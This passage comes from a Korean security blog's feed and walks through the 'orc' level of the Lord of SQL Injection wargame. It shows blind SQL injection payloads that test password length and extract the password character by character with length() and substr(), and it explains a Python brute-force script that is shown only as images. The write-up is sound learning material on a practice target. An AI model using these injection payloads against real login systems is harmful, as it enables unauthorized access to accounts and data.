data-origin-height=&quot;37&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;login test'01 값에 백슬래시(\)를 포함시켜 문자열로 처리하였더니 에러표시가 나지 않는것을 확인할 수 있습니다. login 값에 test'01 값이 없으므로 값은 출력되지 않습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;그럼 다시 문제로 돌아가도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #007700;&quot;&gt;if((&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;$result&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;'pw'&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;])&amp;nbsp;&amp;amp;&amp;amp;&amp;nbsp;(&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;$result&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;'pw'&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;]&amp;nbsp;==&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;$_GET&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;'pw'&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;]))&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;solve&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;&quot;orc&quot;&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;);&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;최종적으로 해당 문제는 저장되어 있는 pw 값과 입력된 pw 값이 같아야 풀리는 문제로 저장되어 있는 pw 값을 찾아야 해결되는 문제입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;739&quot; data-origin-height=&quot;429&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/KWqKK/btrVpDuzWQC/Zc6222k5KTuNGV6AdsiSCK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/KWqKK/btrVpDuzWQC/Zc6222k5KTuNGV6AdsiSCK/img.png&quot; data-alt=&quot;or 1=1 참&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/KWqKK/btrVpDuzWQC/Zc6222k5KTuNGV6AdsiSCK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FKWqKK%2FbtrVpDuzWQC%2FZc6222k5KTuNGV6AdsiSCK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;730&quot; height=&quot;424&quot; data-origin-width=&quot;739&quot; data-origin-height=&quot;429&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;or 1=1 참&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;pw=' or 1=1 # 참인 값을 입력하였더니 Hello admin 문자열을 확인할 수 있었습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;751&quot; data-origin-height=&quot;360&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bVzjY5/btrVkXukd09/pe6YO7UTg8Um1vpt5OHHlk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bVzjY5/btrVkXukd09/pe6YO7UTg8Um1vpt5OHHlk/img.png&quot; data-alt=&quot;or 1=2 거짓&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bVzjY5/btrVkXukd09/pe6YO7UTg8Um1vpt5OHHlk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbVzjY5%2FbtrVkXukd09%2Fpe6YO7UTg8Um1vpt5OHHlk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;730&quot; height=&quot;350&quot; data-origin-width=&quot;751&quot; data-origin-height=&quot;360&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;or 1=2 거짓&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;pw=' or 1=2 # 거짓 값을 입력하였더니 Hello admin 문자열이 표시되지 않습니다. 이것으로 알 수 있는것은 참과 거짓 값이 다르게 표시 되므로 Blind sql injection이 가능하다는 것을 알수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;그럼 우선 우리는 pw를 값을 알아내야 하기 때문에 그전에 pw의 길이를 먼저 알아보도록 하겠습니다. pw의 길이를 확인하기 위해서는 length() 함수와, char_length() 함수를 사용할 수 있지만 char_length() 함수에서는 &lt;span style=&quot;color: #ee2323;&quot;&gt;_&amp;nbsp;&lt;span style=&quot;color: #333333;&quot;&gt;필터링이 되므로 여기서는 length() 함수를 사용하여야 합니다.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;348&quot; data-origin-height=&quot;307&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cw4ItQ/btrVptZYT5c/fqDSm7RRQweD2krLRh1koK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cw4ItQ/btrVptZYT5c/fqDSm7RRQweD2krLRh1koK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cw4ItQ/btrVptZYT5c/fqDSm7RRQweD2krLRh1koK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcw4ItQ%2FbtrVptZYT5c%2FfqDSm7RRQweD2krLRh1koK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;350&quot; height=&quot;309&quot; data-origin-width=&quot;348&quot; data-origin-height=&quot;307&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bWAPP DB에서 login 값의 길이 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;pw 길이 확인&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;855&quot; data-origin-height=&quot;361&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Yt7Yx/btrVoGemP4P/eTnQiTk9zIqfMUxfyyBkCK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Yt7Yx/btrVoGemP4P/eTnQiTk9zIqfMUxfyyBkCK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Yt7Yx/btrVoGemP4P/eTnQiTk9zIqfMUxfyyBkCK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FYt7Yx%2FbtrVoGemP4P%2FeTnQiTk9zIqfMUxfyyBkCK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;317&quot; data-origin-width=&quot;855&quot; data-origin-height=&quot;361&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;?pw='&amp;nbsp;or&amp;nbsp;id='admin'&amp;nbsp;and&amp;nbsp;length(pw)=&lt;span style=&quot;color: #ee2323;&quot;&gt;1&lt;/span&gt;%23&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;select&amp;nbsp;id&amp;nbsp;from&amp;nbsp;prob_orc&amp;nbsp;where&amp;nbsp;id='admin'&amp;nbsp;and&amp;nbsp;pw=''&amp;nbsp;or&amp;nbsp;id='admin'&amp;nbsp;and&amp;nbsp;length(pw)=1#'&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;prob_orc 테이블의 id 컬럼에서 id='admin'이고 pw='' 이거나 id='admin' 이고 pw길이가 1자리인지 확인합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;693&quot; data-origin-height=&quot;215&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cTQZ0q/btrVnYfdU0Y/9NioZnsUzE7Za2f7i2oeV1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cTQZ0q/btrVnYfdU0Y/9NioZnsUzE7Za2f7i2oeV1/img.png&quot; data-alt=&quot;bWAPP DB&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cTQZ0q/btrVnYfdU0Y/9NioZnsUzE7Za2f7i2oeV1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcTQZ0q%2FbtrVnYfdU0Y%2F9NioZnsUzE7Za2f7i2oeV1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;690&quot; height=&quot;214&quot; data-origin-width=&quot;693&quot; data-origin-height=&quot;215&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bWAPP DB의 예시와 같이 length 값이 참이 될 때까지 계속 숫자를 올리면서 확인하는 방법도 있지만, 위의 예시처럼 값이 40자리일 경우 40번의 입력을 해주어야 합니다. 여기서는 파이썬을 통한 자동화 공격으로 확인해보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;870&quot; data-origin-height=&quot;181&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cqvzoh/btrVjPDuE39/BwZZaAvTUNxJHjlnJTC0U1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cqvzoh/btrVjPDuE39/BwZZaAvTUNxJHjlnJTC0U1/img.png&quot; data-alt=&quot;pw 길이값 확인&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cqvzoh/btrVjPDuE39/BwZZaAvTUNxJHjlnJTC0U1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcqvzoh%2FbtrVjPDuE39%2FBwZZaAvTUNxJHjlnJTC0U1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;800&quot; height=&quot;166&quot; data-origin-width=&quot;870&quot; data-origin-height=&quot;181&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;pw 길이값 확인&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;pw의 길이값은 8자리인 것을 확인하였습니다. 즉 쿼리문은 ?pw=' or id='admin' and length(pw)=&lt;span style=&quot;color: #ee2323;&quot;&gt;8&lt;/span&gt;%23 이라는 것을 알 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;파이썬 소스코드 (pw 길이 확인)&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;652&quot; data-origin-height=&quot;434&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/JF7vP/btrVpvpTJJT/jIOeuM12mKXeOqL6KrDmIK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/JF7vP/btrVpvpTJJT/jIOeuM12mKXeOqL6KrDmIK/img.png&quot; data-alt=&quot;파이썬 pw 길이 추출 소스코드&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/JF7vP/btrVpvpTJJT/jIOeuM12mKXeOqL6KrDmIK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FJF7vP%2FbtrVpvpTJJT%2FjIOeuM12mKXeOqL6KrDmIK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;433&quot; data-origin-width=&quot;652&quot; data-origin-height=&quot;434&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;파이썬 pw 길이 추출 소스코드&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;소스코드를 이미지로 붙여 놓은 이유는 이 글을 보시는 분들 중 한 분이라도 직접 타이핑을 하면서 직접 입력을 해보셨으면 하는 마음에서 이미지로 붙여 넣었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;소스코드 설명&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;1,2번 라인 - requests, string 모듈 사용&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;모듈은 다른 파이썬 프로그램에서 불러와 사용할 수 있게끔 만든 파이썬 파일이라고도 할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;4,5번 라인 - url 주소를 입력받고, 그것을 print 함수를 통하여 화면에 출력합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;7, 8번 라인 - pw 길이와, pw 값을 찾아야 하므로 변수를 선언해 주었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;10번 라인 - headers 변수에 현재 쿠키 값을 저장하여 줍니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;12번 라인 - brute 변수에 string 모듈을 사용하여 pw 값에 대입할 값을 저장&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;546&quot; data-origin-height=&quot;240&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/41Ui9/btrVpo5AbFH/q7ne4SMSK5ZR3SR2ryno1K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/41Ui9/btrVpo5AbFH/q7ne4SMSK5ZR3SR2ryno1K/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/41Ui9/btrVpo5AbFH/q7ne4SMSK5ZR3SR2ryno1K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F41Ui9%2FbtrVpo5AbFH%2Fq7ne4SMSK5ZR3SR2ryno1K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;540&quot; height=&quot;237&quot; data-origin-width=&quot;546&quot; data-origin-height=&quot;240&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;14 ~ 24번 라인 - for 문을 통하여 Hello admin이 표시될 때까지 1부터 99까지 값을 대입&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-1078460042237685&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;pw 값 확인 (확인 방법은 여러 가지가 있습니다)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;substr( ) 함수 - 지정한 특정 위치의 문자를 출력해주는 함수입니다.&lt;br /&gt;형식은 substr(&quot;찾을 문자&quot;, &quot;시작위치&quot;, &quot;찾을 글자수&quot;)입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;mid 함수 -&amp;nbsp; 문자에 지정한 시작 위치를 기준으로 일정 개수를 가져오는 함수.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;ord( ) 함수 - 아스키코드를 숫자로 만들어주는 함수이다. &lt;br /&gt;chr( ) 함수 - 숫자를 아스키코드로 바꿔주는 함수이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;796&quot; data-origin-height=&quot;430&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cr0UAj/btrVjmn2llp/mWfQGgTlsIsF1pcSgwjXq1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cr0UAj/btrVjmn2llp/mWfQGgTlsIsF1pcSgwjXq1/img.png&quot; data-alt=&quot;pw 값 확인&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cr0UAj/btrVjmn2llp/mWfQGgTlsIsF1pcSgwjXq1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcr0UAj%2FbtrVjmn2llp%2FmWfQGgTlsIsF1pcSgwjXq1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;405&quot; data-origin-width=&quot;796&quot; data-origin-height=&quot;430&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;pw 값 확인&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;?pw=' or id='admin' and substr(pw,1,1)='0'%23 - pw의 첫 번째 자리의 값이 0인지 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;?pw=' or id='admin' and substr(pw,2,1)='0'%23 - pw의 두 번째 자리의 값이 0인지 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;914&quot; data-origin-height=&quot;214&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c7OmQh/btrVo5FfEIV/xpskEmXDCn45UcvgwnXmsk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c7OmQh/btrVo5FfEIV/xpskEmXDCn45UcvgwnXmsk/img.png&quot; data-alt=&quot;pw 값 확인&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c7OmQh/btrVo5FfEIV/xpskEmXDCn45UcvgwnXmsk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc7OmQh%2FbtrVo5FfEIV%2FxpskEmXDCn45UcvgwnXmsk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;176&quot; data-origin-width=&quot;914&quot; data-origin-height=&quot;214&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;pw 값 확인&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;파이썬 소스코드 (pw 값 확인)&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;663&quot; data-origin-height=&quot;565&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/718lk/btrVkeC4K7O/SqnosjgOMa0e1ppu5bKmSK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/718lk/btrVkeC4K7O/SqnosjgOMa0e1ppu5bKmSK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/718lk/btrVkeC4K7O/SqnosjgOMa0e1ppu5bKmSK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F718lk%2FbtrVkeC4K7O%2FSqnosjgOMa0e1ppu5bKmSK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;554&quot; data-origin-width=&quot;663&quot; data-origin-height=&quot;565&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;전체 소스코드&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;610&quot; data-origin-height=&quot;625&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bRNraf/btrVjm2F0pB/wqnos4Il7ngLAIS2KKLx01/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bRNraf/btrVjm2F0pB/wqnos4Il7ngLAIS2KKLx01/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bRNraf/btrVjm2F0pB/wqnos4Il7ngLAIS2KKLx01/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbRNraf%2FbtrVjm2F0pB%2Fwqnos4Il7ngLAIS2KKLx01%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;610&quot; height=&quot;625&quot; data-origin-width=&quot;610&quot; data-origin-height=&quot;625&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;679&quot; data-origin-height=&quot;481&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/NTqi2/btrVpfOsHF3/Vlx0G6kiwHZKojw31v14U0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/NTqi2/btrVpfOsHF3/Vlx0G6kiwHZKojw31v14U0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/NTqi2/btrVpfOsHF3/Vlx0G6kiwHZKojw31v14U0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FNTqi2%2FbtrVpfOsHF3%2FVlx0G6kiwHZKojw31v14U0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;680&quot; height=&quot;482&quot; data-origin-width=&quot;679&quot; data-origin-height=&quot;481&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Code::War Game/los.rubiya.kr</category>
      <category>lord of sql injection</category>
      <category>LORD OF SQL INJECTION ORC</category>
      <category>Lord of SQLInjection</category>
      <category>Los</category>
      <category>sql injection</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/266</guid>
      <comments>https://securitycode.tistory.com/266#entry266comment</comments>
      <pubDate>Wed, 4 Jan 2023 17:06:33 +0900</pubDate>
    </item>
    <item>
      <title>[LOS] Lord of the SQL Injection - goblin</title>
      <link>https://securitycode.tistory.com/265</link>
